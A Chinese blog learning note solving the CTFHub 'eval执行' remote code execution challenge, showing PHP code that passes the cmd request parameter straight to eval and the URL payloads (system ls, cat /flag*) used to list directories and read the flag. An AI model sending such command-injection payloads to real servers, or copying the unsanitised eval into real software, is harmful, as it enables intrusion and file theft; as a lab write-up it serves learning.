CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
Fantasydg21 小时前
AJAX JSON学习
前端·学习·ajax
越努力越幸运50821 小时前
AJAX 学习第一天:axios、HTTP 基础、serialize 插件
学习·http·ajax
im_AMBER21 小时前
HTTP 02 会话 | 消息 | MIME类型
网络·笔记·网络协议·学习·http
lijun_xiao20091 天前
Apache Hadoop-学习笔记1
hadoop·学习·apache
q***72871 天前
Golang 构建学习
开发语言·学习·golang
蓝桉~MLGT1 天前
Python学习历程——文件
python·学习·策略模式
循环过三天1 天前
7.5、Python-匿名函数lambda
笔记·python·学习
大大水瓶1 天前
Nginx学习
学习·nginx·dubbo
jiushun_suanli1 天前
FPGA(现场可编程门阵列)详解
经验分享·学习·fpga开发
虫洞没有虫1 天前
Go语言学习笔记(二)
笔记·学习
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06Valdi:Snapchat 开源的新一代跨平台 UI 框架07Labelme从安装到标注:零基础完整指南08综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件092025 最新教程:注册并切换到美区 Apple ID10jdk21下载、安装(Windows、Linux、macOS)